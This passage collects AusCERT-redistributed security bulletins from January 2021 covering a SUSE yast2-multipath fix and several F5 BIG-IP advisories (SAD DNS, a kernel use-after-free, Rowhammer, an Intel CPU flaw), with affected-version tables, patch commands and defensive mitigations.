tUldz4Go+2kXetp7EikVJiAkPfLla88u3+29imuScR3K6OuIqfjyqridAqvJaBzi vtrtq4VK34zmWxErO/77KnWvE7kwNvSVR1+A6iKhFiQSdQK0RisGZ2QzIUst7goD DcZEva3ABLMZ6LaXkGRn7XjfmISa9yW5aczTfYex1UVyhMjRWrbwqP45v0XvHiMu O2qLgxgmNow= =DowE -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2021.0265 Security update for yast2-multipath 22 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: yast2-multipath Publisher: SUSE Operating System: SUSE Impact/Access: Overwrite Arbitrary Files -- Existing Account Resolution: Patch/Upgrade CVE Names: CVE-2018-17955 Reference: ESB-2020.3912 Original Bulletin: https://www.suse.com/support/update/announcement/2021/suse-su-20210182-1 - --------------------------BEGIN INCLUDED TEXT-------------------- SUSE Security Update: Security update for yast2-multipath ______________________________________________________________________________ Announcement ID: SUSE-SU-2021:0182-1 Rating: moderate References: #1026027 #1117592 Cross-References: CVE-2018-17955 Affected Products: SUSE Linux Enterprise High Availability 12-SP2 ______________________________________________________________________________ An update that solves one vulnerability and has one errata is now available. Description: This update for yast2-multipath to version 3.1.9 fixes the following issues: Security issue fixed: o CVE-2018-17955: Use random file name instead of static names (bsc#1117592). Non-security issue fixed: o Removed calls to /sbin/insserv (bsc#1026027). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: o SUSE Linux Enterprise High Availability 12-SP2: zypper in -t patch SUSE-SLE-HA-12-SP2-2021-182=1 Package List: o SUSE Linux Enterprise High Availability 12-SP2 (noarch): yast2-multipath-3.1.9-12.3.45 References: o https://www.suse.com/security/cve/CVE-2018-17955.html o https://bugzilla.suse.com/1026027 o https://bugzilla.suse.com/1117592 - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYApb2uNLKJtyKPYoAQhDaQ//bymcSyssZYCror1iAj0Ti4SIZNPboN/B QFTt2oizynd0f3JClzhZblxwoK11W7YV80P9qrPPmBul5nQa8q4E/ody0GsxaAER x8N01scQ1qzwIscEvDAquMuPPkek9OC1lRWHafCe9uLzxqDAF8xKHfzIi6MEhytc +VjeoY/c8As+tgu5A6SWLy8oJxzAPD6A6nvB2q1LayOVTvaRCDEZbeQQiNiWk7Rk bQ11sxuuWNZAv0jbUSe4okpImoz2+Hh1VU5tCrlEAFwR08x1uLP40eQgS6+gBF9T oAk4GgilgcN33D6RNPGfBoHRy3bzksDoQsBhIbUZRY6LlYj1Du+jvQ0qhnVtHojx /7GZBeo74uG+nDHZtfLNTNNQBKIorcjEUXuYwRIVgiHwQrIvKOwDRtuniX22qWWa Job3aZ5rrLGSaEnQbTCh6z8oTTssE5zD1Rm4M/2BQCg3OU5ATQYVwEMSGbmVDpll uInXycNxlxojLteNtpXxjN18KLy1vOf5xqgSPHQUfNcRGtDyN06Fyr9eIWzqkM4x L0/y75mSpkjKNaVGgGVO2ufThFM332iPcOo3CHXBp7pqrrelPQfaMJVsRYxNcVd8 Wu7Y5yZDjhfeWM8SNGFrA/P2ZXsvmmNzIO/w8xhkzK7nkZhkG2X8DRBX2uqC1iTT 7vbrRqlMWdc= =1f7W -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2020.4547.2 Linux kernel and TMM vulnerability CVE-2020-25705 22 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: BIG-IP BIG-IQ Publisher: F5 Networks Operating System: Network Appliance Impact/Access: Denial of Service -- Existing Account Access Confidential Data -- Remote/Unauthenticated Reduced Security -- Remote/Unauthenticated Resolution: Mitigation CVE Names: CVE-2020-25705 CVE-2018-10675 Reference: ESB-2020.4505 ESB-2020.4391 ESB-2020.4377 ESB-2020.4375 Original Bulletin: https://support.f5.com/csp/article/K09604370 https://support.f5.com/csp/article/K40540405 Comment: This bulletin contains two (2) F5 Networks security advisories. Revision History: January 22 2021: K09604370 - Vendor added additional vulnerable component December 24 2020: Initial Release - --------------------------BEGIN INCLUDED TEXT-------------------- K09604370: Linux kernel and TMM vulnerability CVE-2020-25705 Original Publication Date: 24 Dec, 2020 Latest Publication Date: 22 Jan, 2021 Security Advisory Description A flaw in the way reply ICMP packets are limited in the Linux kernel functionality was found that allows to quickly scan open UDP ports. This flaw allows an off-path remote user to effectively bypassing source port UDP randomization. The highest threat from this vulnerability is to confidentiality and possibly integrity, because software that relies on UDP source port randomization are indirectly affected as well. Kernel versions before 5.10 may be vulnerable to this issue. (CVE-2020-25705) Impact A remote off-path attacker can determine open User Datagram Protocol (UDP) source ports on a vulnerable system based on Internet Control Message Protocol (ICMP) error messages, making it possible to execute a "SAD DNS attack." Security Advisory Status F5 Product Development has assigned ID 974093 (BIG-IP-control plane), ID 982697 (BIG-IP-data plane) and ID 974093-4 (BIG-IQ) to this vulnerability. To determine if your product and version have been evaluated for this vulnerability, refer to the Applies to (see versions) box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to K51812227: Understanding security advisory versioning. +--------------+------+----------+----------+----------+------+---------------+ | | |Versions |Fixes | |CVSSv3|Vulnerable | |Product |Branch|known to |introduced|Severity |score^|component or | | | |be |in | |1 |feature | | | |vulnerable| | | | | +--------------+------+----------+----------+----------+------+---------------+ | |16.x |None |Not | | | | | | | |applicable| | | | | +------+----------+----------+ | | | | |15.x |None |Not | | | | |BIG-IP (LTM, | | |applicable| | | | |AAM, Advanced +------+----------+----------+ | | | |WAF, AFM, |14.x |None |Not | | |Linux kernel | |Analytics, | | |applicable| | |(control | |APM, ASM, +------+----------+----------+High |7.4 |plane): ICMP | |DDHD, DNS, |13.x |13.1.0 - |None | | |implementation | |FPS, GTM, Link| |13.1.3 | | | | | |Controller, +------+----------+----------+ | | | |PEM, SSLO) |12.x |12.1.0 - |None | | | | | | |12.1.5 | | | | | | +------+----------+----------+ | | | | |11.x |11.6.1 - |None | | | | | | |11.6.5 | | | | | +--------------+------+----------+----------+----------+------+---------------+ | |16.x |16.0.0 - |None | | | | | | |16.0.1 | | | | | | +------+----------+----------+ | | | | |15.x |15.1.0 - |None | | | | |BIG-IP (LTM, | |15.1.2 | | | | | |AAM, Advanced +------+----------+----------+ | | | |WAF, AFM, |14.x |14.1.0 - |None | | | | |Analytics, | |14.1.3 | | | |TMM^2 (data | |APM, ASM, +------+----------+----------+High |7.4 |plane): ICMP | |DDHD, DNS, |13.x |13.1.0 - |None | | |implementation | |FPS, GTM, Link| |13.1.3 | | | | | |Controller, +------+----------+----------+ | | | |PEM, SSLO) |12.x |12.1.0 - |None | | | | | | |12.1.5 | | | | | | +------+----------+----------+ | | | | |11.x |11.6.1 - |None | | | | | | |11.6.5 | | | | | +--------------+------+----------+----------+----------+------+---------------+ | |7.x |7.0.0 - |None | | | | | | |7.1.0 | | | | | |BIG-IQ +------+----------+----------+ | |Linux kernel | |Centralized |6.x |6.0.0 - |None |High |7.4 |and TMM (ICMP | |Management | |6.1.0 | | | |implementation)| | +------+----------+----------+ | | | | |5.x |5.4.0 |None | | | | +--------------+------+----------+----------+----------+------+---------------+ |Traffix SDC |5.x |None |Not |Not |None |None | | | | |applicable|vulnerable| | | +--------------+------+----------+----------+----------+------+---------------+ ^1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge. ^2The Traffic Management Microkernel (TMM) Security Advisory Recommended Actions If you are running a version listed in the Versions known to be vulnerable column, you can eliminate this vulnerability by upgrading to a version listed in the Fixes introduced in column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists. Mitigation o BIG-IP control plane: Block outgoing ICMP port unreachable messages on the management interface o BIG-IP data plane: Lower the ICMP rate limit on TMM interfaces Configure the maximum reject rate Configure the ICMP error rate BIG-IP control plane: Block outgoing ICMP port unreachable messages on the management interface To mitigate this vulnerability on the management interface, you can block outgoing ICMP port unreachable messages. To do so, perform the following procedure: Impact of action: The impact of blocking ICMP packets depends on your specific environment. F5 recommends testing any such changes during a maintenance window with consideration to the possible impact on your specific environment. 1. Log in to the BIG-IP command line. 2. Block outgoing ICMP port unreachable messages by entering the following command: iptables -A OUTPUT -p icmp --icmp-type destination-unreachable -j DROP 3. Create a backup of the /config/startup file by entering the following command: cp /config/startup /config/startup.backup 4. Using a text editor, edit the /config/startup file. 5. To ensure iptables changes persist across a reboot, add the following lines at the end of the file: # For CVE-2020-25705 described in K09604370 # iptables -A OUTPUT -p icmp --icmp-type destination-unreachable -j DROP # 6. Save the /config/startup file and exit the editor. BIG-IP data plane: Lower the ICMP rate limit on TMM interfaces To mitigate this vulnerability on the Traffic Management Microkernel (TMM) interfaces, you can lower the ICMP rate limit. Adjust to a lower value to lessen the possibility of the vulnerability being exploited, but ensure it is still acceptable based on your environment and conditions. To do so, perform the following procedure: Configure the maximum reject rate The tm.maxrejectrate database key allows you to adjust the number of TCP RST packets or ICMP unreachable packets that the BIG-IP system sends in response to incoming client-side or server-side packets that cannot be matched with existing connections to BIG-IP virtual servers, self IP addresses, or secure network address translations (SNATs). The default value for the tm.maxrejectrate key is 250 TCP RSTs or 250 ICMP unreachable packets per second. The minimum value allowed is 1 and the maximum value is 1000. To adjust the rate at which the BIG-IP system issues TCP RSTs or ICMP unreachable packets, perform the following procedure: Impact of action: The impact of lowering the rate limit of ICMP packets depends on your specific environment. F5 recommends testing any such changes during a maintenance window with consideration to the possible impact on your specific environment. 1. Log in to the TMOS Shell (tmsh) by entering the following command: tmsh 2. Adjust the tm.maxrejectrate database key by using the following command syntax: modify sys db tm.maxrejectrate value For example, to change tm.maxrejectrate to 50, enter the following command: modify sys db tm.maxrejectrate value 50 Configure the ICMP error rate The tm.maxicmprate BigDB key allows you to limit the number of responses the BIG-IP LTM system sends for ICMP errors. The default value for the tm.maxicmprate BigDB key is 100. To adjust the number of ICMP error responses from a BIG-IP system, perform the following procedure: Impact of action: The impact of lowering the rate limit of ICMP packets depends on your specific environment. F5 recommends testing any such changes during a maintenance window with consideration to the possible impact on your specific environment. 1. Log in to tmsh by entering the following command: tmsh 2. Adjust the tm.maxicmprate database key by using the following command syntax: modify /sys db tm.maxicmprate value For example, to change tm.maxicmprate to 50, enter the following command: modify sys db tm.maxicmprate value 50 3. If the tm.maxforwardicmprate database key is not set to the default value of 0, lower the value by using the previous command syntax replacing tm.maxicmprate with tm.maxforwardicmprate. Supplemental Information o K13151: Configuring the rate at which the BIG-IP system issues TCP RSTs or ICMP unreachable packets o K14813: Detecting and mitigating DoS/DDoS attacks (11.4.x - 16.x) o K41942608: Overview of security advisory articles o K4602: Overview of the F5 security vulnerability response policy o K4918: Overview of the F5 critical issue hotfix policy o K9502: BIG-IP hotfix and point release matrix o K13123: Managing BIG-IP product hotfixes (11.x - 16.x) o K15106: Managing BIG-IQ product hotfixes o K15113: BIG-IQ hotfix and point release matrix o K167: Downloading software and firmware from F5 o K9970: Subscribing to email notifications regarding F5 products o K9957: Creating a custom RSS feed to view new and updated documents - -------------------------------------------------------------------------------- K40540405: Linux kernel vulnerability CVE-2018-10675 Original Publication Date: 24 Dec, 2020 Security Advisory Description The do_get_mempolicy function in mm/mempolicy.c in the Linux kernel before 4.12.9 allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted system calls. ( CVE-2018-10675) Impact A local attacker can cause a denial-of-service (DoS) or other negative impacts on a vulnerable system. Security Advisory Status F5 Product Development has assigned ID 976181 (BIG-IP), ID 976409 (BIG-IQ), and CPF-25230 (Traffix SDC) to this vulnerability. To determine if your product and version have been evaluated for this vulnerability, refer to the Applies to (see versions) box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to K51812227: Understanding security advisory versioning. +---------------------+------+----------+----------+--------+------+----------+ | | |Versions |Fixes | |CVSSv3|Vulnerable| |Product |Branch|known to |introduced|Severity|score^|component | | | |be |in | |1 |or feature| | | |vulnerable| | | | | +---------------------+------+----------+----------+--------+------+----------+ | |16.x |None |Not | | | | | | | |applicable| | | | | +------+----------+----------+ | | | | |15.x |None |Not | | | | | | | |applicable| | | | |BIG-IP (LTM, AAM, +------+----------+----------+ | | | |Advanced WAF, AFM, |14.x |None |Not | | | | |Analytics, APM, ASM, | | |applicable| | |Linux | |DDHD, DNS, FPS, GTM, +------+----------+----------+Medium |5.5 |kernel | |Link Controller, PEM,|13.x |None |Not | | | | |SSLO) | | |applicable| | | | | +------+----------+----------+ | | | | |12.x |12.1.0 - |None | | | | | | |12.1.5 | | | | | | +------+----------+----------+ | | | | |11.x |11.6.1 - |None | | | | | | |11.6.5 | | | | | +---------------------+------+----------+----------+--------+------+----------+ | |7.x |7.0.0 - |None | | | | | | |7.1.0 | | | | | |BIG-IQ Centralized +------+----------+----------+ | |Linux | |Management |6.x |6.0.0 - |None |Medium |5.5 |kernel | | | |6.1.0 | | | | | | +------+----------+----------+ | | | | |5.x |5.4.0 |None | | | | +---------------------+------+----------+----------+--------+------+----------+ |Traffix SDC |5.x |5.1.0 |5.1.0 CF |Medium |5.5 |Linux | | | | |22 | | |kernel | +---------------------+------+----------+----------+--------+------+----------+ ^1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge. Security Advisory Recommended Actions If you are running a version listed in the Versions known to be vulnerable column, you can eliminate this vulnerability by upgrading to a version listed in the Fixes introduced in column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists. Mitigation To mitigate this vulnerability, you should permit management access to F5 products only over a secure network and restrict command line access for affected systems to only trusted users. For more information about this mitigation that is applicable to the BIG-IP system, refer to K13309: Restricting access to the Configuration utility by source IP address (11.x - 16.x) and K13092: Overview of securing access to the BIG-IP system. Supplemental Information o K41942608: Overview of security advisory articles o K4602: Overview of the F5 security vulnerability response policy o K4918: Overview of the F5 critical issue hotfix policy o K9502: BIG-IP hotfix and point release matrix o K13123: Managing BIG-IP product hotfixes (11.x - 16.x) o K15106: Managing BIG-IQ product hotfixes o K15113: BIG-IQ hotfix and point release matrix o K167: Downloading software and firmware from F5 o K9970: Subscribing to email notifications regarding F5 products o K9957: Creating a custom RSS feed to view new and updated documents - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYApiv+NLKJtyKPYoAQhO+A//e0dHUCY7SUlPtqTYdk6FATrJEik2bIjl pH5pfKyQd+R7vF/y/e4wwYToNtse+49bOsO6x1t+Zmx3e5DhveVDyuNVN8r/GJeO lSXa1AJGJPQAAefVArP5nllp3LkBJFp/vDaqL9unQQHxygukJJcF/LftuGo39APP Eq7UJNbKsexNw4g8QOtCyQw+uSZA6bazRAUfDdhB85z6CPd5uhZcRynDWFUNe2j8 4ouavOkdWYHz76aft6SEnFZ4oqEfzUZBTpYPHCoWGsviwJ12MGRghv82mj9oUxCa mPzvVIo0YAjqHP91R16w+zZKO9xzHT1KKPbnvc9CHKO/jq0+R26xE+Nc6rB+LFNg F6OV+AzRyTylp3oPctyVzXjnF77xG0s5pDiWw4UEnAXwkKUYJ6IMnL/4pkqv3V6L WCL4JY16XKvhTWCdSvnAPIeO5u5Z8iSQz4MBy0mG9BPnm5xMcBIb5U7M8psKJswm uAahtn51L+Y6BTHy9PF53UYLKd9Y1N300wCG0XMP4LqJN1Uew973xeRNrjlTIVbM 1oOUwjiIWibM86q5D22xuT8uWHl6Q2rf3l5B/zl4U/VL4JXrZiyzs9ZXWIK8RZLi +XXN5B/USEtltc0M5h3ENWS8biXzTQushTnCpSnVR4ogYvaXGVJdAVvrJwTyTlee croxzzOtpPQ= =fV24 -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2020.1764.2 Rowhammer hardware vulnerability CVE-2020-10255 22 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: BIG-IP iSeries VIPRION B4450 blades Publisher: F5 Networks Operating System: Network Appliance Impact/Access: Increased Privileges -- Existing Account Denial of Service -- Existing Account Resolution: Patch/Upgrade CVE Names: CVE-2020-10255 Original Bulletin: https://support.f5.com/csp/article/K60570139 Revision History: January 22 2021: Vendor updated vulnerable product information May 19 2020: Initial Release - --------------------------BEGIN INCLUDED TEXT-------------------- K60570139: Rowhammer hardware vulnerability CVE-2020-10255 Original Publication Date: 19 May, 2020 Latest Publication Date: 22 Jan, 2021 Security Advisory Description Modern DRAM chips (DDR4 and LPDDR4 after 2015) are affected by a vulnerability in deployment of internal mitigations against RowHammer attacks known as Target Row Refresh (TRR), aka the TRRespass issue. To exploit this vulnerability, the attacker needs to create certain access patterns to trigger bit flips on affected memory modules, aka a Many-sided RowHammer attack. This means that, even when chips advertised as RowHammer-free are used, attackers may still be able to conduct privilege-escalation attacks against the kernel, conduct privilege-escalation attacks against the Sudo binary, and achieve cross-tenant virtual-machine access by corrupting RSA keys. The issue affects chips produced by SK Hynix, Micron, and Samsung. NOTE: tracking DRAM supply-chain issues is not straightforward because a single product model from a single vendor may use DRAM chips from different manufacturers. (CVE-2020-10255) Impact This vulnerability impacts BIG-IP iSeries platforms and VIPRION B4450 blades only. An unprivileged system user may leverage this flaw and use rowhammer attack variants to induce bit corruptions across memory space, potentially resulting in a denial of service or privileges escalation scenarios. The highest threat from this vulnerability is to system availability. Security Advisory Status F5 Product Development has assigned ID 909345 (BIG-IP) to this vulnerability. To determine if your product and version have been evaluated for this vulnerability, refer to the Applies to (see versions) box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to K51812227: Understanding Security Advisory versioning. +-------------------+------+----------+----------+----------+------+----------+ | | |Versions |Fixes | |CVSSv3|Vulnerable| |Product |Branch|known to |introduced|Severity |score^|component | | | |be |in | |1 |or feature| | | |vulnerable| | | | | +-------------------+------+----------+----------+----------+------+----------+ | |15.x |15.0.0 - |None | | | | | | |15.1.0 | | | | | | +------+----------+----------+ | | | | |14.x |14.1.0 - |None | | | | |BIG-IP (LTM, AAM, | |14.1.2 | | | | | |AFM, Analytics, +------+----------+----------+ | | | |APM, ASM, DNS, FPS,|13.x |13.1.0 - |None |Medium |6.5 |Hardware: | |GTM, Link | |13.1.3 | | | |DRAM chips| |Controller, PEM) +------+----------+----------+ | | | | |12.x |12.1.0 - |None | | | | | | |12.1.5 | | | | | | +------+----------+----------+ | | | | |11.x |11.6.1 - |None | | | | | | |11.6.5 | | | | | +-------------------+------+----------+----------+----------+------+----------+ | |7.x |None |Not | | | | | | | |applicable| | | | | +------+----------+----------+ | | | |BIG-IQ Centralized |6.x |None |Not |Not |None |None | |Management | | |applicable|vulnerable| | | | +------+----------+----------+ | | | | |5.x |None |Not | | | | | | | |applicable| | | | +-------------------+------+----------+----------+----------+------+----------+ |Traffix SDC |5.x |None |Not |Not |None |None | | | | |applicable|vulnerable| | | +-------------------+------+----------+----------+----------+------+----------+ ^1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge. F5 will not develop a fix for vulnerable products that do not already have a fixed version listed in this article, and will not update this table with subsequent vulnerable releases in the associated branches. F5 recommends that you update to more recent, non-vulnerable versions whenever feasible. For more information, refer to K4602: Overview of the F5 security vulnerability response policy. Security Advisory Recommended Actions If you are running a version listed in the Versions known to be vulnerable column, you can eliminate this vulnerability by upgrading to a version listed in the Fixes introduced in column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists. Mitigation None Supplemental Information o K51812227: Understanding Security Advisory versioning o K41942608: Overview of Security Advisory articles o K4602: Overview of the F5 security vulnerability response policy o K4918: Overview of the F5 critical issue hotfix policy o K9502: BIG-IP hotfix and point release matrix o K13123: Managing BIG-IP product hotfixes (11.x - 15.x) o K167: Downloading software and firmware from F5 o K9970: Subscribing to email notifications regarding F5 products o K9957: Creating a custom RSS feed to view new and updated documents - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: https://www.auscert.org.au/bulletins/ =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: auscert@auscert.org.au Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBYApiz+NLKJtyKPYoAQgf5RAAjoHzIZHrVQdDzjf3cs7XxwCs1aTaUhWY qp/2QmIqTw+Wzy9oUAFWF3tKgT3LcVHvN+6gE1YJJ/Cy+XjB7IfiqSfKNlD+z+cK pDeZmQj48dIBJk69nzY85tzfvLh1bSNGH4Y2eNVYvKEH/urJdfJLGfYf1t8T1zJZ BkC6virdYQDJSIZGKjadwDHdKpawEFOueJBeRFVZUVb2ZdndksIyjxlZAE4JU39H ptuOI+oNPYHqjnhl43txYq7RT+v8eqLVw57KxyYgrfA0cHcKnmbJ1u7MYIUdZKsZ 6zWTnPqRbXr5Yvz6uPA6VqMeK6fMQ1X9zvL0GZG4/xZcLLbCEKYUUWcJcvcEPSx8 9ysrKaRTdk+ZdyBgtPJ1B0VQfgE1l3K0LUcjGulLzZeQGN0axolWPEymON+Dv7mR IsYiqeACCkJS19Nf86qTzziP+7tle/p6Pwr/B8w5z8xDhqM9FaMPLIL75A6R0ega AZLxxGw3eiKCaDC4DSJyman7naw6EjUcUSamfxEC1XOw4FxRluz5McUeyh9Gnl66 UlhBH6yR9kSBI5yAwymh359ewNb8MlXfdsVv/UHBRu9nVHBpMwmqHCcrCAs6trBr GNIpWQCzC9R8iQmR5kp+xDTthICL3KsUlKV2N5x5Hry3DhtX93KyTxFIhkeFagxE CPwlvAVpNWc= =wTLI -----END PGP SIGNATURE-----

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2020.0597.3 Intel processors vulnerability CVE-2019-14607 22 January 2021 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: F5 BIG-IP Products F5 Traffix Products Publisher: F5 Networks Operating System: Network Appliance Impact/Access: Increased Privileges -- Existing Account Access Privileged Data -- Existing Account Denial of Service -- Existing Account Resolution: Patch/Upgrade CVE Names: CVE-2019-14607 Reference: ESB-2019.4707 ESB-2019.4651.2 Original Bulletin: https://support.f5.com/csp/article/K29100014 Revision History: January 22 2021: Vendor updated vulnerable product information February 28 2020: Additional impacts added February 20 2020: Initial Release - --------------------------BEGIN INCLUDED TEXT-------------------- K29100014: Intel processors vulnerability CVE-2019-14607 Original Publication Date: 19 Feb, 2020 Latest Publication Date: 22 Jan, 2021 Security Advisory Description Improper conditions check in multiple Intel- Processors may allow an authenticated user to potentially enable partial escalation of privilege, denial of service and/or information disclosure via local access. ( CVE-2019-14607) Impact While certain F5 hardware platforms contain the affected processor, such as the C109, C113, D110, C115, C117, and C120 platforms, only deployments running a Virtual Clustered Multiprocessing (vCMP) configuration are vulnerable. Deployments without vCMP are not vulnerable, as the issue is limited to virtualized environments that share a physical CPU. All versions of BIG-IP Virtual Edition (VE) are potentially impacted if the processor underlying the BIG-IP VE installation is affected. Microcode updates from Intel are available to address this issue, but must be applied at the hardware level, which is outside the scope of the ability of F5 to support or patch. This hardware issue impacts all platforms using the following Intel processor families o Datacenter Microprocessors o Client and Xeon E3 Microprocessors o Intel Xeon Processor E3 v5 & v6 Family o Intel Xeon E Processor o Intel Xeon D, W Processor o Intel Core i9 8th & 9th Generation BIG-IP The following BIG-IP platforms contain the affected Intel processors: o C113 BIG-IP 4000s - 4200v All 4000s - 4200v do not support vCMP o C109 BIG-IP 5000s - 5250v 5000s do not support vCMP 5200v and 5250v support vCMP o D110 BIG-IP 7000s - 7250v 7000s do not support vCMP 7200v, 7250v, and 7255v support vCMP o C115 (BIG-IP i4600) o C117 (BIG-IP i2600) o C120 (HERCULON i2800) Traffix Only HPE Gen10 servers are vulnerable. Security Advisory Status F5 Product Development has assigned ID 878317 (BIG-IP) and CPF-25174 (Traffix) to this vulnerability. To determine if your product and version have been evaluated for this vulnerability, refer to the Applies to (see versions) box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to K51812227: Understanding Security Advisory versioning. +-------------------+------+----------+----------+----------+------+----------+ | | |Versions |Fixes | |CVSSv3|Vulnerable| |Product |Branch|known to |introduced|Severity |score^|component | | | |be |in | |1 |or feature| | | |vulnerable| | | | | +-------------------+------+----------+----------+----------+------+----------+ | |15.x |15.0.0 - |None | | | | | | |15.1.0 | | | | | | +------+----------+----------+ | | | | |14.x |14.1.0 - |None | | | | |BIG-IP (LTM, AAM, | |14.1.2 | | | | | |AFM, Analytics, +------+----------+----------+ | | | |APM, ASM, DNS, FPS,|13.x |13.1.0 - |None |Medium |5.3 |CPU | |GTM, Link | |13.1.3 | | | | | |Controller, PEM) +------+----------+----------+ | | | | |12.x |12.1.0 - |None | | | | | | |12.1.5 | | | | | | +------+----------+----------+ | | | | |11.x |11.5.2 - |None | | | | | | |11.6.5 | | | | | +-------------------+------+----------+----------+----------+------+----------+ | |7.x |None |Not | | | | | | | |applicable| | | | | +------+----------+----------+ | | | |BIG-IQ Centralized |6.x |None |Not |Not |None |None | |Management | | |applicable|vulnerable| | | | +------+----------+----------+ | | | | |5.x |None |Not | | | | | | | |applicable| | | | +-------------------+------+----------+----------+----------+------+----------+ |Traffix SDC |5.x |5.0.0 - |None |Medium |5.3 |CPU | | | |5.1.0 | | | | | +-------------------+------+----------+----------+----------+------+----------+ ^1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge. F5 will not develop a fix for vulnerable products that do not already have a fixed version listed in this article, and will not update this table with subsequent vulnerable releases in the associated branches. F5 recommends that you update to more recent, non-vulnerable versions whenever feasible. For more information, refer to K4602: Overview of the F5 security vulnerability response policy. Security Advisory Recommended Actions If you are running a version listed in the Versions known to be vulnerable column, you can eliminate this 